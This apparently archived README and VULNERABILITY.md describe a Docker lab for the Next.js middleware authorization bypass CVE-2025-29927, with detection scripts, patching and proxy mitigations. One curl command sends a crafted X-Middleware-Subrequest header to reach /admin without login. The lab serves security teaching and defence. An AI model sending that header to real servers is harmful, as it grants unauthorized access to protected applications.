POC details: c893a1666a57a0591be271e2ed7d8cd0d0e2a41e

Source
Related vulnerability
Title: Next.js security vulnerability (CVE-2025-29927)
Description: Next.js is an open-source React framework from Vercel. Next.js versions before 14.2.25 and before 15.2.3 contain a security vulnerability: when authorization checks are performed in middleware, they can be bypassed.
Introduction
# 🚨 NextJS-CVE-2025-29927-Docker-Lab

This repository contains a **Docker-based lab** environment to explore and demonstrate the **Next.js CVE-2025-29927** vulnerability in a controlled setting.

> ⚠️ **DISCLAIMER:** This lab is for educational and security research purposes only. Do not expose it to the public internet or use it in production.

---

## 📦 Features

- ✅ Vulnerable Next.js application
- ✅ Containerized with Docker
- ✅ Designed for local testing of CVE-2025-29927
- ✅ Includes pre-configured routes and UI
- ✅ Easy to set up and run

---

## 🛠 Prerequisites

Ensure you have the following installed:

- [Docker](https://www.docker.com/products/docker-desktop) (v20+)
- [Git](https://git-scm.com/downloads)
- Optional: [Node.js](https://nodejs.org/) if you plan to run outside Docker

---

## 🚀 Getting Started

Follow these steps to clone and run the lab:

### 1. Clone the Repository

```bash
git clone https://github.com/enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab.git
cd NextJS-CVE-2025-29927-Docker-Lab
```

### 2. Build and Run with Docker

```bash
docker-compose up --build
```

This will:

- Build the Docker image
- Start the vulnerable Next.js server
- Expose the app at [http://localhost:3000](http://localhost:3000)

---

## 📂 Folder Structure

```
.
├── app/                     # Main Next.js app code
├── public/                  # Static assets (images, etc.)
├── Dockerfile               # Docker setup for app
├── docker-compose.yml       # Compose configuration
├── .env                     # Environment variables (if any)
├── README.md                # You are here
```

---

## 🧪 Testing the Vulnerability

# 🛡️ CVE-2025-29927 - Next.js Middleware Authorization Bypass

> ⚠️ **WARNING**: This documentation is for **educational and security research purposes** only. Do not deploy the vulnerable app in a production environment.

---

## 🔍 Overview

**CVE-2025-29927** is a critical authorization bypass vulnerability in Next.js middleware. It allows attackers to skip middleware-based authentication and access protected routes by manipulating the `X-Middleware-Subrequest` header. 

---

## 🧪 Reproducing the Vulnerability

### 1. Accessing Protected Routes Without Authentication

Attempt to access a protected route, such as `/admin`, without any authentication:

```bash
curl http://localhost:3000/admin
```

**Expected Behavior**: Access is denied or redirected to an unauthorized page.

**Vulnerable Behavior**: Access is granted without authentication.

### 2. Bypassing Middleware Using `X-Middleware-Subrequest` Header

Send a request with the `X-Middleware-Subrequest` header to bypass middleware checks:

```bash
curl -H "X-Middleware-Subrequest: src/middleware:nowaf" http://localhost:3000/admin
```

**Result**: Middleware is bypassed, and access to the protected route is granted.
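For the defender side of the two requests above, here is an added example (not part of the lab repository) that scans access-log lines for requests carrying the `X-Middleware-Subrequest` header. Next.js only sets this header on requests it makes to itself, so its presence on a request arriving from an external client is anomalous regardless of the path, and it is rated higher when the path is one the application protects. The JSON-per-line log format, the field names, the IP addresses and the log lines themselves are constructed for the example.

```javascript
// Added example, not code from the lab. Scans JSON-per-line access logs
// (constructed format: ip, method, path, headers) for the subrequest header.
const PROTECTED_PREFIXES = ['/admin', '/account', '/api/admin']; // assumed for this lab
const SUSPICIOUS_HEADER = 'x-middleware-subrequest';

function parseLogLine(line) {
  try {
    return JSON.parse(line);
  } catch (e) {
    return null; // malformed line: skipped, never crashes the scan
  }
}

// Header names are case-insensitive, so match on the lower-cased key.
function headerValue(headers, name) {
  for (const [k, v] of Object.entries(headers || {})) {
    if (k.toLowerCase() === name) return v;
  }
  return undefined;
}

function isProtectedPath(path) {
  return PROTECTED_PREFIXES.some((p) => path === p || path.startsWith(p + '/'));
}

// Returns a finding for one log entry, or null when nothing is suspicious.
function classify(entry) {
  if (!entry || typeof entry !== 'object' || typeof entry.path !== 'string') return null;
  const value = headerValue(entry.headers, SUSPICIOUS_HEADER);
  if (value === undefined) return null;
  const protectedRoute = isProtectedPath(entry.path);
  return {
    ip: entry.ip,
    method: entry.method,
    path: entry.path,
    header: value,
    severity: protectedRoute ? 'high' : 'medium',
    reason: protectedRoute
      ? 'external request with subrequest header on a protected route'
      : 'external request with subrequest header (never sent by real clients)',
  };
}

function scanLogs(text) {
  return text
    .split('\n')
    .map(parseLogLine)
    .map(classify)
    .filter(Boolean);
}

// Constructed sample: one benign request, two carrying the header, one malformed line.
const SAMPLE_LOGS = [
  '{"ip":"203.0.113.10","method":"GET","path":"/","headers":{"host":"localhost:3000"}}',
  '{"ip":"203.0.113.11","method":"GET","path":"/admin","headers":{"host":"localhost:3000","X-Middleware-Subrequest":"src/middleware:nowaf"}}',
  '{"ip":"203.0.113.12","method":"GET","path":"/product/listing/men","headers":{"host":"localhost:3000","x-middleware-subrequest":"src/middleware:nowaf"}}',
  'this line is not json',
].join('\n');

for (const finding of scanLogs(SAMPLE_LOGS)) {
  console.log(`[${finding.severity}] ${finding.ip} ${finding.method} ${finding.path}: ${finding.reason}`);
}
```

The scan runs on the constructed sample and reports two findings: the `/admin` request as high and the product-listing request as medium. Pointing it at real logs only requires the log lines to expose request headers, which the default Next.js server log does not, so this belongs at the reverse proxy or edge where headers are recorded.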

---

## 🛡️ Mitigation Strategies

### 1. Upgrade Next.js to a Patched Version

Update Next.js to one of the following versions where the vulnerability is fixed:

* 14.2.25
* 15.2.3

```bash
npm install next@latest
```

### 2. Implement Middleware Hardening

Enhance your middleware to validate requests properly and reject any with suspicious headers:

```javascript
import { NextResponse } from 'next/server';

export function middleware(request) {
  const subrequestHeader = request.headers.get('x-middleware-subrequest');
  if (subrequestHeader) {
    return new NextResponse('Unauthorized', { status: 401 });
  }
  // Continue with normal processing
  return NextResponse.next();
}
```

### 3. Configure Reverse Proxy to Strip Suspicious Headers

If you're using a reverse proxy (e.g., Nginx), configure it to remove the `X-Middleware-Subrequest` header from incoming requests:

```nginx
location / {
  proxy_pass http://localhost:3000;
  proxy_set_header X-Middleware-Subrequest "";
}
```
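Two small checks that back the mitigation list above, written as an added example rather than code from the lab. One caveat worth stating on strategy 2: on a vulnerable version Next.js skips executing the middleware altogether when the header matches, so a check placed inside `middleware()` is never reached by the bypassing request; upgrading (strategy 1) and stripping the header before it reaches the app (strategy 3) are what actually close the gap. The example therefore (a) compares an installed Next.js version against the two fixed releases the page lists, 14.2.25 and 15.2.3, reporting `null` for release lines the page does not cover rather than guessing, and (b) strips the header, in any casing, from a headers object before it is forwarded, which is the same effect the Nginx rule has. The function names and the sample headers are this example's own.

```javascript
// Added example, not the lab's own code.
// Fixed releases as listed on this page; other major lines are not modeled here.
const FIXED_VERSIONS = { 14: [14, 2, 25], 15: [15, 2, 3] };
const SUSPICIOUS_HEADER = 'x-middleware-subrequest';

// Accepts "15.2.3", "v15.2.3" and prerelease tags such as "15.2.3-canary.1".
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?$/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return { nums: [Number(m[1]), Number(m[2]), Number(m[3])], prerelease: m[4] !== undefined };
}

function compareNums(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// true  = at or above the fixed release for that line
// false = below the fixed release (vulnerable)
// null  = no conclusion: a prerelease build, or a release line the page does not list
function isPatchedNextVersion(version) {
  const { nums, prerelease } = parseVersion(version);
  if (prerelease) return null;
  const fixed = FIXED_VERSIONS[nums[0]];
  if (fixed) return compareNums(nums, fixed) >= 0;
  return nums[0] > 15 ? true : null;
}

// Removes X-Middleware-Subrequest in any casing; returns the cleaned headers
// and how many were dropped, so the edge can also count stripped attempts.
function stripSubrequestHeader(headers) {
  const cleaned = {};
  let removed = 0;
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === SUSPICIOUS_HEADER) {
      removed += 1;
      continue;
    }
    cleaned[name] = value;
  }
  return { headers: cleaned, removed };
}

// Demonstration on constructed inputs.
for (const v of ['14.2.24', '14.2.25', '15.2.2', '15.2.3', '15.2.3-canary.1', '13.5.6']) {
  console.log(`next@${v}: patched = ${isPatchedNextVersion(v)}`);
}
const incoming = { host: 'localhost:3000', 'X-Middleware-Subrequest': 'src/middleware:nowaf' };
console.log(stripSubrequestHeader(incoming));
```

In a Node-based proxy the `stripSubrequestHeader` result is what gets forwarded in place of the client's headers; the `removed` count is a cheap signal to feed into the same alerting as the log scan, since a non-zero count means someone sent a header that no browser or legitimate API client ever sets.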

---

## 📚 References

* [NVD - CVE-2025-29927](https://nvd.nist.gov/vuln/detail/CVE-2025-29927)
* [Datadog Security Labs Analysis](https://securitylabs.datadoghq.com/articles/nextjs-middleware-auth-bypass/)
* [Vercel Postmortem](https://vercel.com/blog/postmortem-on-next-js-middleware-bypass)


This `VULNERABILITY.md` file provides a comprehensive guide to understanding and reproducing the CVE-2025-29927 vulnerability in a controlled environment. It also offers practical mitigation strategies to secure your Next.js applications against such exploits.

For a detailed demonstration and further insights into this vulnerability, refer to the full attack demo by Techtalkpine in the blog post, which also links to the YouTube live demo: https://techtalkpine.com/2025/03/demo-for-cve-2025-29927-nextjs/


---

## 🧹 Tear Down

To stop and remove containers:

```bash
docker-compose down
```

---

## 📚 Resources

- [Next.js Docs](https://nextjs.org/docs)
- [Docker Docs](https://docs.docker.com/)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)

---

## ⚠️ Legal Disclaimer

This project is intended solely for educational and research purposes. You are responsible for using it in accordance with all applicable laws and ethical guidelines. The author is not liable for any misuse or damage caused.





File snapshot

```
[4.0K] /data/pocs/c893a1666a57a0591be271e2ed7d8cd0d0e2a41e
├── [ 647] docker-compose.yml
├── [ 465] Dockerfile
├── [  77] jsconfig.json
├── [4.0K] mysql-init
│   ├── [2.9K] 00_init_and_load.sql
│   ├── [ 295] addresses.csv
│   ├── [  65] cart.csv
│   ├── [  40] order_items.csv
│   ├── [ 108] orders.csv
│   ├── [ 130] products.csv
│   ├── [  69] shipping_addresses.csv
│   └── [ 992] users.csv
├── [ 106] next.config.js
├── [ 895] package.json
├── [419K] package-lock.json
├── [  82] postcss.config.js
├── [4.0K] public
│   ├── [ 295] addresses.csv
│   ├── [  65] cart.csv
│   ├── [4.0K] images
│   │   ├── [ 26M] 01.png
│   │   ├── [ 30M] 02.png
│   │   ├── [ 33M] 03.png
│   │   ├── [ 13M] 04.png
│   │   ├── [4.0K] kids
│   │   │   ├── [ 50K] kids1.jpg
│   │   │   ├── [ 49K] kids2.jpg
│   │   │   ├── [ 51K] kids3.jpg
│   │   │   ├── [ 63K] kids4.jpg
│   │   │   ├── [ 84K] kids5.jpg
│   │   │   ├── [ 87K] kids6.jpg
│   │   │   └── [ 44K] kids7.jpg
│   │   ├── [4.0K] men
│   │   │   ├── [ 66K] men1.jpg
│   │   │   ├── [ 32K] men2.jpg
│   │   │   ├── [163K] men3.jpg
│   │   │   ├── [ 59K] men4.jpg
│   │   │   ├── [122K] men5.jpg
│   │   │   ├── [ 67K] men6.jpg
│   │   │   ├── [ 43K] men7.jpg
│   │   │   └── [ 22K] men8.jpg
│   │   └── [4.0K] women
│   │       ├── [ 32K] women1.jpg
│   │       ├── [ 93K] women2.jpg
│   │       ├── [ 62K] women3.jpg
│   │       ├── [110K] women4.jpg
│   │       ├── [ 20K] women5.jpg
│   │       ├── [ 26K] women6.jpg
│   │       ├── [ 59K] women7.jpg
│   │       └── [ 30K] women8.jpg
│   ├── [1.3K] next.svg
│   ├── [  40] order_items.csv
│   ├── [ 108] orders.csv
│   ├── [ 130] products.csv
│   ├── [  69] shipping_addresses.csv
│   ├── [ 992] users.csv
│   └── [ 629] vercel.svg
├── [5.3K] README.md
├── [4.0K] src
│   ├── [4.0K] app
│   │   ├── [4.0K] account
│   │   │   └── [8.1K] page.js
│   │   ├── [4.0K] admin
│   │   │   └── [1.1K] page.js
│   │   ├── [4.0K] admin-view
│   │   │   ├── [4.0K] add-product
│   │   │   │   └── [2.6K] page.js
│   │   │   ├── [4.0K] all-products
│   │   │   │   └── [ 302] page.js
│   │   │   ├── [ 205] layout.js
│   │   │   └── [6.5K] page.js
│   │   ├── [4.0K] api
│   │   │   ├── [4.0K] address
│   │   │   │   ├── [4.0K] add-new-address
│   │   │   │   │   └── [2.5K] route.js
│   │   │   │   ├── [4.0K] delete-address
│   │   │   │   │   └── [1.2K] route.js
│   │   │   │   ├── [4.0K] get-all-address
│   │   │   │   │   └── [2.6K] route.js
│   │   │   │   └── [4.0K] update-address
│   │   │   │       └── [1.2K] route.js
│   │   │   ├── [4.0K] admin
│   │   │   │   ├── [4.0K] all-products
│   │   │   │   │   └── [ 763] route.js
│   │   │   │   ├── [4.0K] delete-product
│   │   │   │   │   └── [1.2K] route.js
│   │   │   │   ├── [4.0K] orders
│   │   │   │   │   ├── [4.0K] get-all-orders
│   │   │   │   │   │   └── [1.1K] route.js
│   │   │   │   │   └── [4.0K] update-order
│   │   │   │   │       └── [1.4K] route.js
│   │   │   │   ├── [4.0K] product-by-category
│   │   │   │   │   └── [ 801] route.js
│   │   │   │   ├── [4.0K] product-by-id
│   │   │   │   │   └── [ 969] route.js
│   │   │   │   └── [4.0K] update-product
│   │   │   │       └── [1.5K] route.js
│   │   │   ├── [4.0K] cart
│   │   │   │   ├── [4.0K] add-to-cart
│   │   │   │   │   └── [1.9K] route.js
│   │   │   │   ├── [4.0K] all-cart-items
│   │   │   │   │   └── [1.2K] route.js
│   │   │   │   └── [4.0K] delete-from-cart
│   │   │   │       └── [1.2K] route.js
│   │   │   ├── [4.0K] login
│   │   │   │   └── [2.2K] route.js
│   │   │   ├── [4.0K] order
│   │   │   │   ├── [4.0K] create-order
│   │   │   │   │   └── [1.1K] route.js
│   │   │   │   ├── [4.0K] get-all-orders
│   │   │   │   │   └── [1.1K] route.js
│   │   │   │   └── [4.0K] order-details
│   │   │   │       └── [1.2K] route.js
│   │   │   ├── [4.0K] register
│   │   │   │   └── [1.8K] route.js
│   │   │   └── [4.0K] stripe
│   │   │       └── [1.1K] route.js
│   │   ├── [4.0K] cart
│   │   │   └── [2.5K] page.js
│   │   ├── [4.0K] checkout
│   │   │   └── [9.9K] page.js
│   │   ├── [ 25K] favicon.ico
│   │   ├── [ 652] globals.css
│   │   ├── [ 595] layout.js
│   │   ├── [4.0K] login
│   │   │   └── [5.1K] page.js
│   │   ├── [1.8K] middleware.js
│   │   ├── [4.0K] orders
│   │   │   ├── [4.0K] [order-details]
│   │   │   │   └── [7.2K] page.js
│   │   │   └── [4.4K] page.js
│   │   ├── [7.0K] page.js
│   │   ├── [4.0K] product
│   │   │   ├── [4.0K] [details]
│   │   │   │   └── [ 360] page.js
│   │   │   └── [4.0K] listing
│   │   │       ├── [4.0K] all-products
│   │   │       │   └── [2.9K] page.js
│   │   │       ├── [4.0K] kids
│   │   │       │   └── [1.7K] page.js
│   │   │       ├── [4.0K] men
│   │   │       │   └── [1.7K] page.js
│   │   │       └── [4.0K] women
│   │   │           └── [1.7K] page.js
│   │   ├── [4.0K] register
│   │   │   └── [5.2K] page.js
│   │   └── [4.0K] unauthorized-page
│   │       └── [1016] page.js
│   ├── [4.0K] assets
│   │   ├── [ 26M] 01.png
│   │   ├── [ 25M] 02.png
│   │   ├── [ 33M] 03.png
│   │   └── [ 10M] 04.png
│   ├── [4.0K] components
│   │   ├── [ 880] AdminProtector.js
│   │   ├── [4.0K] CartModal
│   │   │   └── [5.7K] index.js
│   │   ├── [4.0K] CommonCart
│   │   │   └── [5.7K] index.js
│   │   ├── [4.0K] CommonDetails
│   │   │   └── [5.3K] index.js
│   │   ├── [4.0K] CommonListing
│   │   │   ├── [1.0K] index.js
│   │   │   ├── [4.0K] ProductButtons
│   │   │   │   └── [3.3K] index.js
│   │   │   └── [4.0K] ProductTile
│   │   │       └── [1.5K] index.js
│   │   ├── [4.0K] CommonModal
│   │   │   └── [2.2K] index.js
│   │   ├── [4.0K] FormElements
│   │   │   ├── [4.0K] InputComponent
│   │   │   │   └── [ 610] index.js
│   │   │   ├── [4.0K] SelectComponent
│   │   │   │   └── [ 940] index.js
│   │   │   └── [4.0K] TileComponent
│   │   │       └── [ 930] index.js
│   │   ├── [4.0K] Loader
│   │   │   └── [4.0K] componentlevel
│   │   │       └── [ 362] index.js
│   │   ├── [4.0K] Navbar
│   │   │   └── [6.3K] index.js
│   │   └── [4.0K] Notification
│   │       └── [ 405] index.js
│   ├── [4.0K] context
│   │   └── [3.7K] index.js
│   ├── [4.0K] database
│   │   └── [ 942] index.js
│   ├── [4.0K] middleware
│   │   └── [ 863] AuthUser.js
│   ├── [1.9K] middleware.js
│   ├── [4.0K] models
│   │   ├── [2.4K] address.js
│   │   ├── [2.5K] cart.js
│   │   ├── [3.8K] order.js
│   │   ├── [2.7K] product.js
│   │   └── [1.4K] user.js
│   ├── [4.0K] services
│   │   ├── [4.0K] address
│   │   │   └── [1.8K] index.js
│   │   ├── [4.0K] cart
│   │   │   └── [1.1K] index.js
│   │   ├── [4.0K] login
│   │   │   └── [1.0K] index.js
│   │   ├── [4.0K] order
│   │   │   └── [1.8K] index.js
│   │   ├── [4.0K] product
│   │   │   └── [2.1K] index.js
│   │   ├── [4.0K] register
│   │   │   └── [ 372] index.js
│   │   └── [4.0K] stripe
│   │       └── [ 434] index.js
│   └── [4.0K] utils
│       ├── [ 313] cookies.js
│       └── [4.1K] index.js
├── [ 480] tailwind.config.js
└── [3.6K] VULNERABILITY.md

83 directories, 133 files
```
The Shenlong bot has cached this for you.
Notes
    1. Access through the original source is recommended.
    2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.